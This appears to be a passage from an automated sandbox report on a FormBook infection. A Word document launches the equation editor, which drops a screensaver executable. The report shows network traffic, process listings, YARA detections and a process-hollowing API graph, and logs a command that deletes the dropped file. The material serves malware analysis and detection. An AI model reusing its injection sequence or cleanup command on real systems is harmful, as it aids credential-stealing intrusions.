                                                                              2024-06-25 13:14:03 UTC166OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
                                                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: universalmovies.top
                                                                              2024-06-25 13:14:03 UTC734INHTTP/1.1 405 Method Not Allowed
                                                                              Date: Tue, 25 Jun 2024 13:14:03 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Allow: HEAD,GET,POST,OPTIONS,TRACE
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1QV31jp148TcCX162%2B8Rvx2YKfOCtVmEnQ%2FO76FyLNI9kVIOb99e2kQKe6SJ%2FUPF5AQP7kLOfuzfNuYb7txzbq234nROcxvQ4kMLOGgo25L2r4TlnhUWB748m9eL%2FCADKwEVn2kz"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                              X-Content-Type-Options: nosniff
                                                                              Server: cloudflare
                                                                              CF-RAY: 899537ea8de272ad-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-06-25 13:14:03 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                              Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                                                              2024-06-25 13:14:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Code Manipulations

                                                                              User Modules

                                                                              Hook Summary

                                                                              Function NameHook TypeActive in Processes
                                                                              PeekMessageAINLINEexplorer.exe
                                                                              PeekMessageWINLINEexplorer.exe
                                                                              GetMessageWINLINEexplorer.exe
                                                                              GetMessageAINLINEexplorer.exe

                                                                              Processes

                                                                              Process: explorer.exe, Module: USER32.dll
                                                                              Function NameHook TypeNew Data
                                                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEB
                                                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEB
                                                                              GetMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEB
                                                                              GetMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEB

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:09:13:38
                                                                              Start date:25/06/2024
                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                              Imagebase:0x13f280000
                                                                              File size:1'423'704 bytes
                                                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:09:13:55
                                                                              Start date:25/06/2024
                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                              Imagebase:0x400000
                                                                              File size:543'304 bytes
                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:09:13:57
                                                                              Start date:25/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\nelb82019.scr
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\nelb82019.scr"
                                                                              Imagebase:0xc30000
                                                                              File size:628'736 bytes
                                                                              MD5 hash:607868824F841FF4B6E24E997228D10D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 0000000A.00000002.402124623.0000000000860000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 37%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:09:13:57
                                                                              Start date:25/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\nelb82019.scr
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\nelb82019.scr"
                                                                              Imagebase:0xc30000
                                                                              File size:628'736 bytes
                                                                              MD5 hash:607868824F841FF4B6E24E997228D10D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:09:13:58
                                                                              Start date:25/06/2024
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0xff2f0000
                                                                              File size:3'229'696 bytes
                                                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:14
                                                                              Start time:09:14:00
                                                                              Start date:25/06/2024
                                                                              Path:C:\Windows\SysWOW64\wlanext.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\wlanext.exe"
                                                                              Imagebase:0xc00000
                                                                              File size:77'312 bytes
                                                                              MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:16
                                                                              Start time:09:14:03
                                                                              Start date:25/06/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del "C:\Users\user\AppData\Roaming\nelb82019.scr"
                                                                              Imagebase:0x4a1f0000
                                                                              File size:302'592 bytes
                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:35.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:25.5%
                                                                                Total number of Nodes:47
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 4194 2425e0 4196 2425e5 4194->4196 4197 24260a 4196->4197 4198 244fe3 CreateProcessW 4196->4198 4199 244ffe 4198->4199 4200 244228 4201 244242 4200->4201 4202 244292 4201->4202 4204 2442da 4201->4204 4205 24431b 4204->4205 4224 244012 4205->4224 4228 244018 4205->4228 4206 2447e9 4232 243eb8 4206->4232 4236 243ec0 4206->4236 4207 244ac8 4218 243ec0 WriteProcessMemory 4207->4218 4219 243eb8 WriteProcessMemory 4207->4219 4208 2448cd 4208->4207 4216 243ec0 WriteProcessMemory 4208->4216 4217 243eb8 WriteProcessMemory 4208->4217 4209 244b06 4210 244bee 4209->4210 4240 243d98 4209->4240 4244 243d90 4209->4244 4248 244130 4210->4248 4252 244138 4210->4252 4211 244cab 4211->4201 4216->4208 4217->4208 4218->4209 4219->4209 4225 24400f 4224->4225 4225->4224 4226 244095 VirtualAllocEx 4225->4226 4227 2440d4 4226->4227 4227->4206 4229 24405c VirtualAllocEx 4228->4229 4231 2440d4 4229->4231 4231->4206 4233 243ec0 WriteProcessMemory 4232->4233 4235 243fa5 4233->4235 4235->4208 4237 243f0c WriteProcessMemory 4236->4237 4239 243fa5 4237->4239 4239->4208 4241 243de1 Wow64SetThreadContext 4240->4241 4243 243e59 4241->4243 4243->4210 4245 243d98 Wow64SetThreadContext 4244->4245 4247 243e59 4245->4247 4247->4210 4249 244138 ResumeThread 4248->4249 4251 2441c8 4249->4251 4251->4211 4253 24417c ResumeThread 4252->4253 4255 2441c8 4253->4255 4255->4211 4256 245248 ReadProcessMemory 4257 245307 4256->4257

                                                                                Executed Functions

                                                                                Function 002442DA Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 854 2442da-244319 855 244320-2444a6 854->855 856 24431b 854->856 863 2444cd-244512 call 24370c 855->863 864 2444a8-2444cc 855->864 856->855 868 244514-244530 863->868 869 24453b-2445a5 863->869 864->863 868->869 875 2445a7 869->875 876 2445ac-2445d8 869->876 875->876 878 244639-24466b call 243724 876->878 879 2445da-24460c call 243718 876->879 886 244694 878->886 887 24466d-244689 878->887 884 244635-244637 879->884 885 24460e-24462a 879->885 888 244695-24469f 884->888 885->884 886->888 887->886 890 2446a6-2446ec call 243730 888->890 891 2446a1 888->891 897 244715-24472e 890->897 898 2446ee-24470a 890->898 891->890 899 244786-2447e4 897->899 900 244730-24475c call 24373c 897->900 898->897 978 2447e7 call 244012 899->978 979 2447e7 call 244018 899->979 905 244785 900->905 906 24475e-24477a 900->906 905->899 906->905 910 2447e9-2447fe 911 244800-244811 910->911 912 244813-244815 910->912 914 24481b-24482f 911->914 912->914 915 244831-24486b 914->915 916 24486c-244883 914->916 915->916 917 244885-2448a1 916->917 918 2448ac-2448c8 916->918 917->918 976 2448cb call 243ec0 918->976 977 2448cb call 243eb8 918->977 920 2448cd-2448ed 922 244916-24494b 920->922 923 2448ef-24490b 920->923 927 244aa3-244ac2 922->927 923->922 928 244950-2449d4 927->928 929 244ac8-244b01 927->929 938 244a98-244a9d 928->938 939 2449da-244a49 928->939 982 244b04 call 243ec0 929->982 983 244b04 call 243eb8 929->983 933 244b06-244b26 935 244b4f-244b82 933->935 936 244b28-244b44 933->936 942 244b84-244b8b 935->942 943 244b8c-244b9f 935->943 936->935 938->927 980 244a4c call 243ec0 939->980 981 244a4c call 243eb8 939->981 942->943 944 244ba6-244bd1 943->944 945 244ba1 943->945 950 244bd3-244be9 944->950 951 244c3b-244c6d call 243748 944->951 945->944 984 244bec call 243d90 950->984 985 244bec call 243d98 950->985 958 244c96 951->958 959 244c6f-244c8b 951->959 953 244a4e-244a6e 956 244a97 953->956 957 244a70-244a8c 953->957 955 244bee-244c0e 960 244c37-244c39 955->960 961 244c10-244c2c 955->961 956->938 957->956 962 244c97-244ca6 958->962 959->958 960->962 961->960 986 244ca9 call 244130 962->986 987 244ca9 call 244138 962->987 966 244cab-244ccb 969 244cf4-244dfd 966->969 970 244ccd-244ce9 966->970 970->969 976->920 977->920 978->910 979->910 980->953 981->953 982->933 983->933 984->955 985->955 986->966 987->966
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (
                                                                                • API String ID: 0-3887548279
                                                                                • Opcode ID: f7471c7a4b13c51bbdd65b43496de1e68742ee3401ce41beb4f8494f8f17412c
                                                                                • Instruction ID: 3e619b23876230c621f344f981a0b8fe940a82f9c8eb90d39b906d3051e791a7
                                                                                • Opcode Fuzzy Hash: f7471c7a4b13c51bbdd65b43496de1e68742ee3401ce41beb4f8494f8f17412c
                                                                                • Instruction Fuzzy Hash: 9452D274E01229CFDB68DF65C894BEDBBB2AF89301F1481EAD409A7295DB345E85CF40
                                                                                Function 00243EB8 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 988 243eb8-243f2b 991 243f42-243fa3 WriteProcessMemory 988->991 992 243f2d-243f3f 988->992 994 243fa5-243fab 991->994 995 243fac-243ffe 991->995 992->991 994->995
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00243F93
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 9fb8be7a6ecc80ce2e9bc3139e86b1763b6d8b208cb63f7603247f4368fb08b3
                                                                                • Instruction ID: 2a2bb6e5248e3c6a7d32e5f3d6c9ad829defefce7dc08d5d720fbeab4c36a443
                                                                                • Opcode Fuzzy Hash: 9fb8be7a6ecc80ce2e9bc3139e86b1763b6d8b208cb63f7603247f4368fb08b3
                                                                                • Instruction Fuzzy Hash: 3C41A9B5D012589FCF00CFA9D984AEEFBF1BF49310F24942AE818B7210D335AA55CB64
                                                                                Function 00243EC0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1000 243ec0-243f2b 1002 243f42-243fa3 WriteProcessMemory 1000->1002 1003 243f2d-243f3f 1000->1003 1005 243fa5-243fab 1002->1005 1006 243fac-243ffe 1002->1006 1003->1002 1005->1006
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00243F93
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 0fca5d2056329ff96ce8a86cb630010a0062b43d3b3f5fc912e00a9a919b2fba
                                                                                • Instruction ID: 25c76cb5a170cb4a8f9960edef3d6a5e8fe074ce8c36dd186e2e4f9afeaf966c
                                                                                • Opcode Fuzzy Hash: 0fca5d2056329ff96ce8a86cb630010a0062b43d3b3f5fc912e00a9a919b2fba
                                                                                • Instruction Fuzzy Hash: EA4199B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE818B7210D375AA55CB64
                                                                                Function 00244012 Relevance: 1.6, APIs: 1, Instructions: 108memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1011 244012-244014 1012 244016-24408e 1011->1012 1013 24400f-244011 1011->1013 1016 244095-2440d2 VirtualAllocEx 1012->1016 1013->1011 1017 2440d4-2440da 1016->1017 1018 2440db-244125 1016->1018 1017->1018
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002440C2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 29424250f58d9a20c49b2b13d4c1e1baa6c76457e8c52a3324d6bc1925a683d5
                                                                                • Instruction ID: ca868e8fd97d7ccabf5fcab51263bbee658fda06a8f01569eab90c0c9774c0fa
                                                                                • Opcode Fuzzy Hash: 29424250f58d9a20c49b2b13d4c1e1baa6c76457e8c52a3324d6bc1925a683d5
                                                                                • Instruction Fuzzy Hash: FC41DAB4D002489FCF14CFA9D884AEEFBB1BF49310F10A42AE814B7210C375A955CF65
                                                                                Function 00245242 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1023 245242-245305 ReadProcessMemory 1025 245307-24530d 1023->1025 1026 24530e-24534c 1023->1026 1025->1026
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002452F5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: bf58c2a4950c41efb2c49b78e377a75bcffebb4a25ff9a3e4eeead075330da64
                                                                                • Instruction ID: 1a0d51f7ac521cce6f315de4107ddd7c5628ed867b2a40b0b27ab910636ce040
                                                                                • Opcode Fuzzy Hash: bf58c2a4950c41efb2c49b78e377a75bcffebb4a25ff9a3e4eeead075330da64
                                                                                • Instruction Fuzzy Hash: 274179B9D04258DFCF10CFAAD984ADEFBB1BB19310F14A06AE814B7210D375A945CF65
                                                                                Function 00244018 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1029 244018-2440d2 VirtualAllocEx 1032 2440d4-2440da 1029->1032 1033 2440db-244125 1029->1033 1032->1033
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002440C2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 9c46f715b3ae4d4e0c468abc3fd07133826fcbf00dcd0f13606f06b8c132f373
                                                                                • Instruction ID: 20129463231f5175487ad7af35b84c2fa07de90c5c3c350c3273a48b8da9696b
                                                                                • Opcode Fuzzy Hash: 9c46f715b3ae4d4e0c468abc3fd07133826fcbf00dcd0f13606f06b8c132f373
                                                                                • Instruction Fuzzy Hash: 5731A8B9D002489FCF14CFA9D984AEEFBB1BB49310F10A42AE814B7310D735A955CF64
                                                                                Function 00245248 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1038 245248-245305 ReadProcessMemory 1039 245307-24530d 1038->1039 1040 24530e-24534c 1038->1040 1039->1040
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002452F5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 8a4f24167624d70f67d802adcd4cfe8828246f66516b0c1adebe126dcb27d356
                                                                                • Instruction ID: 2808ac7c069fc34551705319e2359263ebf444ca0720849566b5e1e1713cc9c3
                                                                                • Opcode Fuzzy Hash: 8a4f24167624d70f67d802adcd4cfe8828246f66516b0c1adebe126dcb27d356
                                                                                • Instruction Fuzzy Hash: 433188B9D042589FCF10CFAAD984ADEFBB1BB19310F14A06AE814B7310D375A945CF64
                                                                                Function 00243D90 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1043 243d90-243df8 1046 243e0f-243e57 Wow64SetThreadContext 1043->1046 1047 243dfa-243e0c 1043->1047 1049 243e60-243eac 1046->1049 1050 243e59-243e5f 1046->1050 1047->1046 1050->1049
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00243E47
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 68cd69e806e27b462f15293ca8c6ed492c5995d6d841facb955055373f8cd43a
                                                                                • Instruction ID: 3ddbeb493cadde4447276d8762f261fdafe4fec9c81b029aa30fb44d189c732d
                                                                                • Opcode Fuzzy Hash: 68cd69e806e27b462f15293ca8c6ed492c5995d6d841facb955055373f8cd43a
                                                                                • Instruction Fuzzy Hash: D541CBB5D012189FCB14CFAAD884AEEFBF1BF49314F24842AE404B7200D738AA49CF54
                                                                                Function 00243D98 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1055 243d98-243df8 1057 243e0f-243e57 Wow64SetThreadContext 1055->1057 1058 243dfa-243e0c 1055->1058 1060 243e60-243eac 1057->1060 1061 243e59-243e5f 1057->1061 1058->1057 1061->1060
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00243E47
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.400455836.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_240000_nelb82019.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 58298f0ceb02356585628daae36302fa3ae09f565c4ede60c7bccd4bf7feaa06
